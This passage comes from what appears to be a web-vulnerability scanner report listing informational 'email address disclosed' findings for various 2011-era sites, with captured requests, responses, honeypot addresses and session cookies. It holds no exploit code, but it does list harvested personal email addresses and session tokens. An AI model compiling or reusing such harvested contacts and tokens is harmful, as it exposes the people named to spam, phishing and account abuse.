User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-4; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.4.10.1296568533;

Response

21.251. https://www.astaro.com/en/myastaro/contact_us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/en/myastaro/contact_us

Issue detail

The following email addresses were disclosed in the response:

aweb@who-is-using-me.com
caweb@who-is-using-me.com
distribution@astaro.com
faweb@who-is-using-me.com
licensing@astaro.com
maweb@who-is-using-me.com
orders@astaro.com
renewals@astaro.com
webmaster@astaro.com

Request

GET /en/myastaro/contact_us HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-4; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.4.10.1296568533;

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 13:58:46 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 13:58:46 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.com
Content-language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...
<meta name="honeypot" value="maweb@who-is-using-me.com" />
...[SNIP]...
<a href="mailto:distribution@astaro.com" target="_self">distribution@astaro.com</a>
...[SNIP]...
<a href="mailto:orders@astaro.com" target="_self">orders@astaro.com</a>
...[SNIP]...
<a href="mailto:renewals@astaro.com" target="_self">renewals@astaro.com</a>
...[SNIP]...
<a href="mailto:licensing@astaro.com" target="_self">licensing@astaro.com</a>
...[SNIP]...
<a href="mailto:webmaster@astaro.com" target="_self">webmaster@astaro.com</a>
...[SNIP]...
<a href="mailto:webmaster@astaro.com">
...[SNIP]...

<form><input type="hidden" name="honeypot" value="mailto:faweb@who-is-using-me.com" /></form>
<span style="color: white;">aweb@who-is-using-me.com</span>
...[SNIP]...

21.252. https://www.astaro.com/en/user/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/en/user/login

Issue detail

The following email addresses were disclosed in the response:

aweb@who-is-using-me.com
caweb@who-is-using-me.com
faweb@who-is-using-me.com
maweb@who-is-using-me.com
webmaster@astaro.com

Request

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 13:58:46 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 13:58:46 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.com
Content-language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...
<meta name="honeypot" value="maweb@who-is-using-me.com" />
...[SNIP]...
<a href="mailto:webmaster@astaro.com">webmaster@astaro.com</a>
...[SNIP]...
<a href="mailto:webmaster@astaro.com">
...[SNIP]...

<form><input type="hidden" name="honeypot" value="mailto:faweb@who-is-using-me.com" /></form>
<span style="color: white;">aweb@who-is-using-me.com</span>
...[SNIP]...

21.253. https://www.astaro.com/tool/signup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/tool/signup

Issue detail

The following email addresses were disclosed in the response:

aweb@who-is-using-me.com
caweb@who-is-using-me.com
faweb@who-is-using-me.com
maweb@who-is-using-me.com
webmaster@astaro.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:56:58 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 13:56:58 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.com
Content-language: en-US
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 20898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...
<meta name="honeypot" value="maweb@who-is-using-me.com" />
...[SNIP]...
<a href="mailto:webmaster@astaro.com">
...[SNIP]...

<form><input type="hidden" name="honeypot" value="mailto:faweb@who-is-using-me.com" /></form>
<span style="color: white;">aweb@who-is-using-me.com</span>
...[SNIP]...

21.254. https://www.astaro.com/user/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/user/login

Issue detail

The following email addresses were disclosed in the response:

aweb@who-is-using-me.com
caweb@who-is-using-me.com
faweb@who-is-using-me.com
maweb@who-is-using-me.com
webmaster@astaro.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:55:49 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: eZSESSIDen=3arq6oafh8mmgccr289cup83h1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 13:55:49 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.com
Content-language: en-US
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 8951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...
<meta name="honeypot" value="maweb@who-is-using-me.com" />
...[SNIP]...
<a href="mailto:webmaster@astaro.com">webmaster@astaro.com</a>
...[SNIP]...
<a href="mailto:webmaster@astaro.com">
...[SNIP]...

<form><input type="hidden" name="honeypot" value="mailto:faweb@who-is-using-me.com" /></form>
<span style="color: white;">aweb@who-is-using-me.com</span>
...[SNIP]...

21.255. https://www.astaro.de/beacon/(beid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.de
Path:	/beacon/(beid

Issue detail

The following email addresses were disclosed in the response:

aweb@who-is-using-me.com
caweb@who-is-using-me.com
faweb@who-is-using-me.com
maweb@who-is-using-me.com
myastaro@astaro.com
webmaster@astaro.com

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:30:08 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: eZSESSIDde=osr305vfiegtr4m0rumdbdt3r7; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 14:30:08 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.de
Content-language: de-DE
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE">
<head>

...[SNIP]...
<meta name="honeypot" value="maweb@who-is-using-me.com" />
...[SNIP]...
<a href="mailto:myastaro@astaro.com">myastaro@astaro.com</a>
...[SNIP]...
<a href="mailto:webmaster@astaro.com">
...[SNIP]...

<form><input type="hidden" name="honeypot" value="mailto:faweb@who-is-using-me.com" /></form>
<span style="color: white;">aweb@who-is-using-me.com</span>
...[SNIP]...

21.256. http://www.astaro.es/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.es
Path:	/

Issue detail

The following email addresses were disclosed in the response:

aweb@who-is-using-me.com
caweb@who-is-using-me.com
faweb@who-is-using-me.com
maweb@who-is-using-me.com
webmaster@astaro.com

Request

GET / HTTP/1.1
Host: www.astaro.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: eZSESSIDes=va54a0ioaplpc7s3t9i0p3vsb3; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 14:30:09 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.es
Content-language: es-ES
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 22337
Date: Tue, 01 Feb 2011 14:30:10 GMT
X-Varnish: 1753558798
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES">
<head>

...[SNIP]...
<meta name="honeypot" value="maweb@who-is-using-me.com" />
...[SNIP]...
<a href="mailto:webmaster@astaro.com">
...[SNIP]...

<form><input type="hidden" name="honeypot" value="mailto:faweb@who-is-using-me.com" /></form>
<span style="color: white;">aweb@who-is-using-me.com</span>
...[SNIP]...

21.257. https://www.astaro.net/beacon/(beid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.net
Path:	/beacon/(beid

Issue detail

The following email addresses were disclosed in the response:

aweb@who-is-using-me.com
caweb@who-is-using-me.com
faweb@who-is-using-me.com
maweb@who-is-using-me.com
myastaro@astaro.com
webmaster@astaro.com

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:30:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: eZSESSIDen=bsb7dte2ge5s4c59fbs7127q65; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 14:30:13 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.net
Content-language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...
<meta name="honeypot" value="maweb@who-is-using-me.com" />
...[SNIP]...
<a href="mailto:myastaro@astaro.com">myastaro@astaro.com</a>
...[SNIP]...
<a href="mailto:webmaster@astaro.com">
...[SNIP]...

<form><input type="hidden" name="honeypot" value="mailto:faweb@who-is-using-me.com" /></form>
<span style="color: white;">aweb@who-is-using-me.com</span>
...[SNIP]...

21.258. http://www.bing.com/s/osd3.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/s/osd3.xml

Issue detail

The following email address was disclosed in the response:

msosa@microsoft.com

Request

GET /s/osd3.xml HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 29 May 2009 19:00:47 GMT
ETag: 76EA0033E4279EAF87C4514EAD7F4163000002E2
Cache-Control: public, max-age=2677287
Content-Length: 738
Date: Wed, 02 Feb 2011 15:44:10 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Bing</ShortName>
<Tags>Bing</Tags>
<Description>Bing. Search b
...[SNIP]...
<Contact>msosa@microsoft.com</Contact>
...[SNIP]...

21.259. http://www.cs.tut.fi/~jkorpela/quirks-mode.html, previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cs.tut.fi
Path:	/~jkorpela/quirks-mode.html,

Issue detail

The following email address was disclosed in the response:

jkorpela@cs.tut.fi

Request

GET /~jkorpela/quirks-mode.html, HTTP/1.1
Host: www.cs.tut.fi
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 04:07:17 GMT
Server: Apache
Content-Location: notfound.shtml
Vary: negotiate,accept-language
TCN: choice
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 4643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html lang="en">
<head>
<base href="http://www.cs.tut.fi/~jkorpela/">
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">

...[SNIP]...
<a href="mailto:jkorpela@cs.tut.fi"
><code>jkorpela@cs.tut.fi</code>
...[SNIP]...

21.260. http://www.dillerdesign.com/experiment/DD_belatedPNG/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dillerdesign.com
Path:	/experiment/DD_belatedPNG/

Issue detail

The following email address was disclosed in the response:

drew.diller@gmail.com

Request

GET /experiment/DD_belatedPNG/ HTTP/1.1
Host: www.dillerdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:44:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.16
Connection: close
Content-Type: text/html
Content-Length: 30282

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
               
...[SNIP]...
<a href="mailto:drew.diller@gmail.com">
...[SNIP]...
<a href="mailto:drew.diller@gmail.com">
...[SNIP]...

21.261. http://www.directstartv.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.directstartv.com
Path:	/

Issue detail

The following email address was disclosed in the response:

comments@DirectStarTV.com

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.262. http://www.ehow.com/about_us/about_us.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/about_us/about_us.aspx

Issue detail

The following email addresses were disclosed in the response:

member.service@ehow.com
press@demandmedia.com

Request

Response

21.263. http://www.ehow.com/about_us/faq_ehow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/about_us/faq_ehow.aspx

Issue detail

The following email addresses were disclosed in the response:

member.service@ehow.com
press@demandmedia.com

Request

Response

21.264. http://www.ehow.com/privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/privacy.aspx

Issue detail

The following email address was disclosed in the response:

legal@demandmedia.com

Request

Response

21.265. http://www.ehow.com/terms_use.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/terms_use.aspx

Issue detail

The following email address was disclosed in the response:

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:32 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73073

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Terms of Use | eHow.com</title>
<meta charset=
...[SNIP]...
cease displaying such materials within thirty (30) days of our receipt of such notice. Your written notice to us must be sent to 15801 NE 24th Street, Bellevue, WA 98008, Attn: Copyright Agent, or to copyright@demandmedia.com, and contain the following information:</p>
...[SNIP]...
<div class="email">copyright@demandmedia.com</div>
...[SNIP]...

21.266. https://www.ehow.com/privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/privacy.aspx

Issue detail

The following email address was disclosed in the response:

legal@demandmedia.com

Request

GET /privacy.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

21.267. https://www.ehow.com/terms_use.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/terms_use.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /terms_use.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:45:20 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73067

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Terms of Use | eHow.com</title>
<meta charset=
...[SNIP]...
cease displaying such materials within thirty (30) days of our receipt of such notice. Your written notice to us must be sent to 15801 NE 24th Street, Bellevue, WA 98008, Attn: Copyright Agent, or to copyright@demandmedia.com, and contain the following information:</p>
...[SNIP]...
<div class="email">copyright@demandmedia.com</div>
...[SNIP]...

21.268. http://www.exploit-db.com/exploits/15313/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.exploit-db.com
Path:	/exploits/15313/

Issue detail

The following email address was disclosed in the response:

h02332@gmail.com

Request

GET /exploits/15313/ HTTP/1.1
Host: www.exploit-db.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:07:21 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 04:07:21 GMT
ETag: W/"4a15e0-3879-49b58e6f3b040"
Accept-Ranges: bytes
Content-Length: 14457
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
l Business Manager 10.2 + Site Editor
# Product Description URL http://www.parallels.com/products/small-business-panel/
# Date: 2010-09-17
# Author : David Hoyt ... http://cloudscan.me
# Contact : h02332@gmail.com
# Home : http://cloudscan.me
# Dork : Small Business Manager
# Bug : Cross Site Scripting + SQL Injection
# Tested on : Plesk Small Business Manager 10.2.0 // Windows 2008 /64/R2
# Disclosure :
...[SNIP]...

21.269. http://www.faneuilhallmarketplace.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.faneuilhallmarketplace.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

patricia.marcus@ggp.com
rebecca.stoddard@ggp.com

Request

GET / HTTP/1.1
Host: www.faneuilhallmarketplace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.270. http://www.gnu.org/copyleft/gpl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnu.org
Path:	/copyleft/gpl.html

Issue detail

The following email addresses were disclosed in the response:

gnu@gnu.org
web-translators@gnu.org
webmasters@gnu.org
you@example.com

Request

GET /copyleft/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:19:58 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Thu, 03 Feb 2011 04:19:58 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...

...[SNIP]...

21.271. http://www.gnu.org/licenses/gpl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnu.org
Path:	/licenses/gpl.html

Issue detail

The following email addresses were disclosed in the response:

gnu@gnu.org
web-translators@gnu.org
webmasters@gnu.org
you@example.com

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:30:24 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 01 Feb 2011 14:30:24 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...

...[SNIP]...

21.272. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The following email address was disclosed in the response:

tweid05@gmail.com

Request

GET /finance?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

21.273. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

eapeters@chr.ucla.edu

Request

Response

21.274. https://www.google.com/accounts/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/Login

Issue detail

The following email address was disclosed in the response:

pat@example.com

Request

Response

21.275. http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hotels.com
Path:	/ho113791/millennium-bostonian-hotel-boston-boston-united-states/

Issue detail

The following email addresses were disclosed in the response:

emailaddress1@domain.com
emailaddress2@domain.com
userexperience@hotels.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Last-Modified: Thu, 25 Nov 2010 06:00:00 GMT
Cache-Control: no-cache,no-store,must-revalidate,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store,must-revalidate,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 15:57:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESSID=BFCC292E8C0621AA80BCE939DC8ED021.hm04tc03; Domain=.hotels.com; Path=/
Set-Cookie: guid=2ee125b2-c3d7-49a1-b623-8a4cdfa3d152; Domain=.hotels.com; Expires=Thu, 02-Feb-2012 15:57:56 GMT; Path=/
Set-Cookie: jsEnabled=false; Domain=.hotels.com; Expires=Thu, 03-Feb-2011 15:57:56 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Thu, 02-Feb-2012 15:57:56 GMT; Path=/
Set-Cookie: SSLB=0; path=/; domain=.hotels.com
Content-Length: 287933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a id="header_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: Hotel Details Landing Description Tab|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
<li>emailaddress1@domain.com</li>
<li>emailaddress2@domain.com</li>
...[SNIP]...
<a id="toplinks_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: Hotel Details Landing Description Tab|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
